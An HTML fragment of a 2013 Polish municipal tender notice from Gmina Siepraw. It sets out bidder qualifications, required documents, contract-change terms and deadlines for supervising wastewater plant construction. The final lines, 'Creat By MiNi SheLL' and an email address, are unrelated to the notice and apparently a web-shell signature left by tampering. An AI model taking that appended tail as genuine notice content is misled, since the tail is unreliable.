<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek: Zamawiający nie określa szczegółowych warunków w tym zakresie. 
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek: Wykonawca musi się wykazać wiedzą i doświadczeniem w wykonaniu usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej: jednej usługi polegającej na pełnieniu funkcji inspektora nadzoru inwestorskiego nad budową lub rozbudową oczyszczalni ścieków o przepustowości minimum 700 m3/d, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane należycie. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o dokumenty załączone do ofert, których wykaz zawiera punkt 6 siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek: Zamawiający nie określa szczegółowych warunków w tym zakresie. 
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 2 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek:
a)	wymagana jest osoba, która będzie koordynatorem zespołu inspektorów nadzoru i równocześnie będzie pełnić funkcję inspektora nadzoru inwestorskiego w specjalności konstrukcyjno - budowlanej;
- Kwalifikacje zawodowe: osoba mogąca sprawować samodzielnie funkcje techniczne w budownictwie bez ograniczeń w specjalności konstrukcyjno-budowlanej, posiadająca uprawnienia do kierowania i nadzorowania. 
- Doświadczenie zawodowe: Wymagane jest by osoba ta posiadała, co najmniej 3-letnie doświadczenie w kierowaniu lub nadzorowaniu robót ogólnobudowlanych, w tym jednej roboty budowlanej polegającej na budowie, modernizacji lub rozbudowie oczyszczalni ścieków. 
b)	wymagana jest osoba, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych:
- Kwalifikacje zawodowe: osoba mogąca sprawować samodzielnie funkcje techniczne w budownictwie bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych posiadająca uprawnienia do kierowania i nadzorowani. 
- Doświadczenie zawodowe: Wymagane jest by osoba ta posiadała, co najmniej 3-letnie doświadczenie w kierowaniu lub nadzorowaniu robót, w tym jednej roboty budowlanej polegającej na budowie, modernizacji lub rozbudowie oczyszczalni ścieków. 
c)	wymagana jest osoba, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w zakresie branży robót drogowych;
- Kwalifikacje zawodowe: osoba mogąca sprawować samodzielnie funkcje techniczne w budownictwie w zakresie branży robót drogowych posiadająca uprawnienia do kierowania i nadzorowania. 
- Doświadczenie zawodowe: Wymagane jest by osoba ta posiadała co najmniej 3-letnie doświadczenie w kierowaniu lub nadzorowaniu robót, w tym jednej roboty  drogowej polegające na ułożeniu nawierzchni z kostki brukowej o powierzchni minimum 500 m2.
d)	wymagana jest osoba, która będzie pełnić funkcję inspektora nadzoru inwestorskiego w zakresie branży robót elektrycznych;
- Kwalifikacje zawodowe: osoba mogąca sprawować samodzielnie funkcje techniczne w budownictwie w zakresie branży robót elektrycznych posiadająca uprawnienia do kierowania i nadzorowania. 
- Doświadczenie zawodowe: Wymagane jest by osoba ta posiadała co najmniej 3-letnie doświadczenie w kierowaniu lub nadzorowaniu w w/w specjalności, w tym jednej roboty budowlanej polegającej na budowie, modernizacji lub rozbudowie oczyszczalni ścieków.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o dokumenty załączone do ofert, których wykaz zawiera punkt 6 siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek: Zamawiający nie określa szczegółowych warunków w tym zakresie. 
Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 2 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca jest zobowiązany złożyć wykaż usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane (w tym co najmniej 1 usługę polegającą na pełnieniu nadzoru inwestorskiego nad  budową lub rozbudową oczyszczalni ścieków o przepustowości minimum 700 m3/d - według wzoru stanowiącego załącznik nr 6 do siwz) oraz załączenie dowodów, czy zostały wykonane należycie. Zamawiający nie wymaga składania informacji o usługach niewykonanych lub wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Wypełniony załącznik  nr 1 - Oferta.
b) Pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszcza się możliwość zmian postanowień zawartej umowy w zakresie terminu wykonania zadania, jeżeli w trakcie jej obowiązywania wystąpią: 
- działania organów administracji lub innych podmiotów, związane z przekroczeniem obowiązujących terminów wydania lub odmowy wydania decyzji, zezwoleń, uzgodnień, 
- w przypadku wydłużenia terminu realizacji zadania, o taki sam okres ulegnie wydłużeniu okres nadzoru inwestorskiego.
2. Dopuszcza się możliwość zmian postanowień zawartej umowy w zakresie ceny jeżeli w trakcie jej obowiązywania: 
- Zamawiający przewiduje zmianę ceny brutto w przypadku ustawowej zmiany stawki podatku VAT. Cena brutto będzie podlegać waloryzacji o różnicę w kwocie podatku VAT wynikającej ze zmiany stawki podatku na stawkę podatku obowiązującego w dniu powstania obowiązku podatkowego.
- Zostaną wprowadzone nowe podatki lub opłaty o charakterze publicznoprawnym,
3. Dopuszcza się możliwość zmian postanowień zawartej umowy w zakresie formy prawnej Wykonawcy jeżeli w trakcie jej obowiązywania: 
- zmianie ulegnie siedziba, adres, lub zmiana formy prawnej działalności Wykonawcy.
4. Dopuszcza się możliwość zmian postanowień zawartej umowy w zakresie osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych takich jak: śmierć, choroba, ustanie stosunku pracy, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje. Zmiana wymaga pisemnej zgody Zamawiającego i wymaga zmiany postanowień umowy.
5. Dopuszcza się możliwość zmian osób w zespole inspektorów nadzoru w kwestii zastępstwa. Wykonawca musi zwrócić się do Zamawiającego z wnioskiem o wyrażenie zgody na zastępstwo wraz z przedłożeniem dokumentów potwierdzających równoważne doświadczenie i kwalifikacje osoby zastępującej. Zastępstwo wymaga pisemnej zgody Zamawiającego, i nie wymaga zmiany postanowień umowy.
6. Zamawiający może w uzasadnionych przypadkach żądać zmiany inspektora nadzoru.
7. W przypadku braku możliwości realizacji części zadania umowa zostanie zmieniona w zakresie jej przedmiotu, terminu wykonania i wynagrodzenia.
8. Dopuszcza się możliwość w szczególnie uzasadnionych przypadkach zmiany zakresu robót planowanych do powierzenia podwykonawcom.
9. Dopuszcza się możliwość zmiany umowy w przypadkach wystąpienia oczywistych omyłek rachunkowych i pisarskich.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.siepraw.pl zakładka: Aktualności<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Siepraw 32-447 Siepraw 1, piętro I, pokój nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2013 godzina 10:00, miejsce: Urząd Gminy Siepraw 32-447 Siepraw 1, piętro I, pokój nr 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Uporządkowanie gospodarki ściekowej na terenie Gminy Dobczyce i Siepraw wokół zalewu Dobczyckiego, który uzyskał dofinansowanie z Funduszu Spójności na warunkach określonych w umowie POIS.01.01.00-00-194/09-00 zawartej w dniu 30.07.2010r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com